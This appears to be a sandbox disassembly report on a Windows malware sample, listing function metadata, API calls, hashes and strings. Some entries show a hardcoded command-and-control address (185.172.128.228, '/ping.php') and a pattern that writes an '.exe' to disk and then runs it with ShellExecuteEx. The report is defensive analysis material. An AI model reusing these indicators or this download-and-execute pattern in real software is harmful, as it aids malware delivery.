Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041ED98
_free.LIBCMT ref: 0041EDAA
_free.LIBCMT ref: 0041EDBC
_free.LIBCMT ref: 0041EDCE

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 12b51190f65240c3d2ef2a1ad5896f3b430592fd2ccf38004c9c9016fab84203
Instruction ID: d5ef32133b98e4fb2412931fa35fae6bc57e2fe493cbd1108eefdbae164f4dde
Opcode Fuzzy Hash: 12b51190f65240c3d2ef2a1ad5896f3b430592fd2ccf38004c9c9016fab84203
Instruction Fuzzy Hash: 6DF04F32544310ABCA20EB6AF885DDB73E9BA44714755181AF848D7640C638FCC0865D

Uniqueness

Uniqueness Score: -1.00%

Function 004152B2 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004152D0

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 004152E2
_free.LIBCMT ref: 004152F5
_free.LIBCMT ref: 00415306
_free.LIBCMT ref: 00415317

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction ID: 804699b6a5c80bac2842bae3f4e6e7460cbec33686f784624dec7bd42b1af61a
Opcode Fuzzy Hash: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction Fuzzy Hash: 41F030714413209B8A16BF15FC416893B60FB4871831275AFF50866275CB3959918FCE

Uniqueness

Uniqueness Score: -1.00%

Function 05C05519 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 05C05537

Part of subcall function 05C06501: HeapFree.KERNEL32(00000000,00000000,?,05C0F288,?,00000000,?,00000000,?,05C0F52C,?,00000007,?,?,05C0F920,?), ref: 05C06517
Part of subcall function 05C06501: GetLastError.KERNEL32(?,?,05C0F288,?,00000000,?,00000000,?,05C0F52C,?,00000007,?,?,05C0F920,?,?), ref: 05C06529

_free.LIBCMT ref: 05C05549
_free.LIBCMT ref: 05C0555C
_free.LIBCMT ref: 05C0556D
_free.LIBCMT ref: 05C0557E

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction ID: 74464cc08e6c7c1bd427dd5efcc48a1783ad69348c1f4733c8ea347f454c33e5
Opcode Fuzzy Hash: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction Fuzzy Hash: 7DF054B09115109BDA27AF54FC446153761FB04710312796EF145522B8CF3647E1AFCB

Uniqueness

Uniqueness Score: -1.00%

Function 0041608E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Strings

@, xrefs: 0041618D

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2895899722
Opcode ID: 70cdf97db86fb0d935fe44adb4be9c8666ab98f3e4a20976dc49b384eadb291b
Instruction ID: ae3557305dc9c54a6d59b1edd30c6b9f9c56a404ae947bd98c264bdf0008d32a
Opcode Fuzzy Hash: 70cdf97db86fb0d935fe44adb4be9c8666ab98f3e4a20976dc49b384eadb291b
Instruction Fuzzy Hash: EF51D171D00209ABDB10AFA9C845FEF7BB8AF45314F12015BE804B7292D778D982CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004132C3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\QPoX60yhZt.exe,00000104), ref: 00413303
_free.LIBCMT ref: 004133CE
_free.LIBCMT ref: 004133D8

Strings

C:\Users\user\Desktop\QPoX60yhZt.exe, xrefs: 004132FA, 00413301, 00413330, 00413368

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\QPoX60yhZt.exe
API String ID: 2506810119-61558017
Opcode ID: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction ID: e0cf6dde0ac7f492d26fb7a27bfd3cf8f71fda75d9391d43b3cd8632259efb82
Opcode Fuzzy Hash: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction Fuzzy Hash: 72319371A0021CABDB219F9698819DEBBB8EB85315F1041ABED14D7210DB799A81CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 05C0352A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\QPoX60yhZt.exe,00000104), ref: 05C0356A
_free.LIBCMT ref: 05C03635
_free.LIBCMT ref: 05C0363F

Strings

C:\Users\user\Desktop\QPoX60yhZt.exe, xrefs: 05C03561, 05C03568, 05C03597, 05C035CF

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\QPoX60yhZt.exe
API String ID: 2506810119-61558017
Opcode ID: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction ID: f927219c930f3f27614f80ea39da589698fd9bac1638d44b33634bb2dfbb584a
Opcode Fuzzy Hash: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction Fuzzy Hash: 2231B3B1A04298AFDB21DF99DC84DAEBBFCFB85B10F105866E50597290DB708A40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 05C16777 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40synchronizationCOMMON

Download Yara Rule

APIs

ShellExecuteEx.SHELL32(?), ref: 05C167B9
WaitForSingleObject.KERNEL32(?,00008000), ref: 05C167CD
CloseHandle.KERNEL32(?), ref: 05C167D6

Strings

.exe, xrefs: 05C16782

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: CloseExecuteHandleObjectShellSingleWait
String ID: .exe
API String ID: 3837156514-4119554291
Opcode ID: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction ID: 3ccbe23546ac4c35cf13fd2f119d1b3244bc37b44b1869afd6a1cf0ad9e166a6
Opcode Fuzzy Hash: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction Fuzzy Hash: E6015631E00218EBDB15DFA9E8459DDBBB8FF08640F008126E801A6260EB709A85CB84

Uniqueness

Uniqueness Score: -1.00%

Function 05C164A9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,.exe,00000000,?,?,05C15B74,00000001,?,/ping.php?substr=%s), ref: 05C164C4
WriteFile.KERNEL32(00000000,?,?,00000001,00000000,?,05C15B74,00000001,?,/ping.php?substr=%s,?), ref: 05C164DC
CloseHandle.KERNEL32(00000000,?,05C15B74,00000001,?,/ping.php?substr=%s,?), ref: 05C164E5

Strings

.exe, xrefs: 05C164AE

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: .exe
API String ID: 1065093856-4119554291
Opcode ID: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction ID: 2ddee74fe31eb9b75342b6d1d8eb1bae8241d0e72bd0824aa24b61e293ea64ad
Opcode Fuzzy Hash: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction Fuzzy Hash: 7DE06572601124BBD7311B999C48FA7BE6CEF865A0F040125FB05D21109661DD0197B8

Uniqueness

Uniqueness Score: -1.00%

Function 00417D6F Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00417DFA
__alldvrm.LIBCMT ref: 00417FFB
__alldvrm.LIBCMT ref: 0041801D

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction ID: fd8853d8f1522a73f401650a4168fe8705857821074eec12fc08c2aeadde5945
Opcode Fuzzy Hash: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction Fuzzy Hash: 9EA11272A083869FDB218E18C881BEBBBF1EF55354F1441AEE5859B281D63C8982C758

Uniqueness

Uniqueness Score: -1.00%

Function 05C07FD6 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 05C08061
__alldvrm.LIBCMT ref: 05C08262
__alldvrm.LIBCMT ref: 05C08284

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction ID: 912a53f4f131be14221d5c10a6a20c47fbed04fe85823d8145e9868c388c313d
Opcode Fuzzy Hash: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction Fuzzy Hash: 91A15732A047869FEB25CF18C890BBEBBE5FF11350F1889ADD9959B2C1C6388A41C750

Uniqueness

Uniqueness Score: -1.00%

Function 0042286F Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0042299E

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e1eff9f77d6fe5220b41880063169ad7198556d756e84d98a38d826084e6795b
Instruction ID: 928e3cb369f2e27a6f9c5d6c25e794823a6f45c2d4bbec1796fd6aa098e8f7c9
Opcode Fuzzy Hash: e1eff9f77d6fe5220b41880063169ad7198556d756e84d98a38d826084e6795b
Instruction Fuzzy Hash: B2411B71B002247BDB206B7A9D41BAE36A4EF05334F54021BF818D6291D6FC8DC19669

Uniqueness

Uniqueness Score: -1.00%

Function 05C12AD6 Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 05C12C05

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 0327c6b289028ba5b2b3c2fb758003783598fcbdb2bec9316035b6f17d33412a
Instruction ID: dbbd467c3d6eaea98627ed08baf2340e961bb73cf20fdde351ce8963e757c9ce
Opcode Fuzzy Hash: 0327c6b289028ba5b2b3c2fb758003783598fcbdb2bec9316035b6f17d33412a
Instruction Fuzzy Hash: 65414B3DB041156BDB256EBA8C8CE7E3AAAFF03330F100E15FC19D62D0DAB48551B669

Uniqueness

Uniqueness Score: -1.00%

Function 05C0B567 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,0042E790,00000000,00000000,8B56FF8B,05C04002,?,00000004,00000001,0042E790,0000007F,?,8B56FF8B,00000001), ref: 05C0B5B4
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 05C0B63D
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 05C0B64F
__freea.LIBCMT ref: 05C0B658

Part of subcall function 05C07CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05C07CDE

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 4c9fcdccec6534139f4d5072acc38e80a3e5bc7209392af5cdc3591196cc905b
Instruction ID: 9ad37b170e2c1d4940754885bd25755ff762ff80916635b35d19fd57a576eab2
Opcode Fuzzy Hash: 4c9fcdccec6534139f4d5072acc38e80a3e5bc7209392af5cdc3591196cc905b
Instruction Fuzzy Hash: 9331C172A0020AABDF28CF65CC44EBE7BA5EF40714F040569ED09D71A0EB36DD64CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040CCAA Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0040CCC4

Part of subcall function 0040CC11: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0040CC40
Part of subcall function 0040CC11: ___AdjustPointer.LIBCMT ref: 0040CC5B

_UnwindNestedFrames.LIBCMT ref: 0040CCD9
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0040CCEA
CallCatchBlock.LIBVCRUNTIME ref: 0040CD12

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction ID: f1d65ff4a2caa8f4402a5ee0af87b259506669f2abbd9cc63769bcbaa0b6a130
Opcode Fuzzy Hash: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction Fuzzy Hash: 1D012D32500108BBDF116F96CC81DEF7F69EF99758F044129FE0866261D73AE861EBA4

Uniqueness

Uniqueness Score: -1.00%

Function 05BFCF11 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 05BFCF2B

Part of subcall function 05BFCE78: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 05BFCEA7
Part of subcall function 05BFCE78: ___AdjustPointer.LIBCMT ref: 05BFCEC2

_UnwindNestedFrames.LIBCMT ref: 05BFCF40
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 05BFCF51
CallCatchBlock.LIBVCRUNTIME ref: 05BFCF79

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction ID: 9266409de42c85a005d40bae547af27e2756a06c6da3e14de74a7bc123255cda
Opcode Fuzzy Hash: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction Fuzzy Hash: 7D012932204109BBCF126E95DC44EEB7F6AFF99754F044154FE08A6120D732E8699BA0

Uniqueness

Uniqueness Score: -1.00%

Function 05C074BA Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,05BFED94,00000000,00000000,?,05C07461,05BFED94,00000000,00000000,00000000,?,05C07719,00000006,0042F348), ref: 05C074EC
GetLastError.KERNEL32(?,05C07461,05BFED94,00000000,00000000,00000000,?,05C07719,00000006,0042F348,0042F340,0042F348,00000000,00000364,?,05C07052), ref: 05C074F8
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,05C07461,05BFED94,00000000,00000000,00000000,?,05C07719,00000006,0042F348,0042F340,0042F348,00000000), ref: 05C07506

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction ID: 54fa5f4f803ebfb15c69783ede19e8c469bdb20d79e049144ca99b052692a3ff
Opcode Fuzzy Hash: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction Fuzzy Hash: 8C01FC367552279BC7358F699C44EA677D9FF05B61B501D30FA0AD31C0DB20EA01C6D4

Uniqueness

Uniqueness Score: -1.00%

Function 0041293D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 004129CD

Strings

pow, xrefs: 004129A5, 004129C2

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 1002f3fead58ecdd09521feafb71d77c6abc34bad63ee383d6bbf70ab6509b6f
Instruction ID: 0a9ba9cf01538bb623dd895b254acf0ed02b79a8d0ee48bda8380b1111d13792
Opcode Fuzzy Hash: 1002f3fead58ecdd09521feafb71d77c6abc34bad63ee383d6bbf70ab6509b6f
Instruction Fuzzy Hash: 3651607175420196C7217718DF813FB6BA0EB40750F64497BE085C23A9EB7D8CE6DA8E

Uniqueness

Uniqueness Score: -1.00%

Function 0041DDFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0041DE21

Strings

.A, xrefs: 0041DE13
, xrefs: 0041DE66

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: Info
String ID: $.A
API String ID: 1807457897-2696116503
Opcode ID: 894c406951e1bf4a9ddc63c434b686542591dbb70d0a2e0ead158e77a5fc9e7b
Instruction ID: bc213980aac5c6bda6009a83c5849e62ad2cee4ae6a6ae2e32fe98ed2f123d1c
Opcode Fuzzy Hash: 894c406951e1bf4a9ddc63c434b686542591dbb70d0a2e0ead158e77a5fc9e7b
Instruction Fuzzy Hash: EA410AF190434C9EDB218E248D84BFABBB9DF55304F1404EEE58A97142D23DAA86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 05BFA937 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 05BFA96A
__IsNonwritableInCurrentImage.LIBCMT ref: 05BFAA23

Strings

csm, xrefs: 05BFAA0D

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction ID: 214fdd3a41b1bb1a3f9483770412c4125412123e755ea0848380d624537b0884
Opcode Fuzzy Hash: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction Fuzzy Hash: E441F334A002099BCF14DF68C884AAEBBB5FF45318F14C1E5EA196B391C771B95DCB90

Uniqueness

Uniqueness Score: -1.00%

Function 0041FD92 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002), ref: 0041FE6D

Strings

OCP, xrefs: 0041FDE6
ACP, xrefs: 0041FDB0

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction ID: db8a1e39b5ed56134af0dcb237998205fad8b660637b78a6cadd581e1e0cf4fb
Opcode Fuzzy Hash: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction Fuzzy Hash: 20213872A04301A6DB308E15D9017E7739A9B60B24F164077E90AC7312E73ADDC7C39C

Uniqueness

Uniqueness Score: -1.00%

Function 05C0FFF9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002), ref: 05C100D4

Strings

ACP, xrefs: 05C10017
OCP, xrefs: 05C1004D

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction ID: a736786ff58b9526a9da1ee8439ad58aa08fb2ddf5950768653c6e491c7c307d
Opcode Fuzzy Hash: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction Fuzzy Hash: 5821B262A00104A7E7348A758909FA772ABBB46B51F068C65ED0AF7200F736DAC0E35C

Uniqueness

Uniqueness Score: -1.00%

Function 05C162B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05C162B6

Part of subcall function 05BF1E19: __EH_prolog.LIBCMT ref: 05BF1E1E

Part of subcall function 05BF266A: __EH_prolog.LIBCMT ref: 05BF266F

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 05C16398

Strings

,jC, xrefs: 05C1638D

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: H_prolog$Ios_base_dtorstd::ios_base::_
String ID: ,jC
API String ID: 420165198-3201430929
Opcode ID: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction ID: 3e279df9e174fbebc9380be0e24e431b64aee092236604955c483352209a6196
Opcode Fuzzy Hash: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction Fuzzy Hash: F2310BB5E01119EBDB14DF98D985AEDFBB4FF48304F1085AAE405A3640DB746E48CF60

Uniqueness

Uniqueness Score: -1.00%

Function 004171B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00417217
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00417224

Strings

-@, xrefs: 004171EE, 00417202, 004171F3

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID: -@
API String ID: 2279764990-2564449678
Opcode ID: d5f4a00e4ea312b7d3a414fb44f76d48f23aa1c3aa7f8720876b6b1e831c6d21
Instruction ID: 290a678ed3add9fd0faa91afd9d0ee705692a8110a20fb2286b59343c35ba588
Opcode Fuzzy Hash: d5f4a00e4ea312b7d3a414fb44f76d48f23aa1c3aa7f8720876b6b1e831c6d21
Instruction Fuzzy Hash: 2B110A33A041209BAF369E19DC809DB73B5EB847247164172FD19AB354DA34DC86C6D9

Uniqueness

Uniqueness Score: -1.00%

Function 0040356F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00403574

Strings

/ping.php?substr=%s, xrefs: 0040357C
185.172.128.228, xrefs: 0040357B

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: H_prolog
String ID: /ping.php?substr=%s$185.172.128.228
API String ID: 3519838083-3577573015
Opcode ID: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction ID: 7b6dfb3f8f1c8d27c76164ee4eac5e21074d72dd8ad347809e0f3e64fbe8a7e5
Opcode Fuzzy Hash: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction Fuzzy Hash: 0F01C472A01114BBDB04AF899C41BAEF769EF45315F10013FF405E3292D3789E41C6E9

Uniqueness

Uniqueness Score: -1.00%

Function 00402FE5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402FEA
std::locale::_Init.LIBCPMT ref: 0040300E

Part of subcall function 00407D73: __EH_prolog3.LIBCMT ref: 00407D7A
Part of subcall function 00407D73: std::_Lockit::_Lockit.LIBCPMT ref: 00407D85
Part of subcall function 00407D73: std::locale::_Setgloballocale.LIBCPMT ref: 00407DA0
Part of subcall function 00407D73: _Yarn.LIBCPMT ref: 00407DB6
Part of subcall function 00407D73: std::_Lockit::~_Lockit.LIBCPMT ref: 00407DF6

Strings

T*@, xrefs: 00402FFA

Memory Dump Source

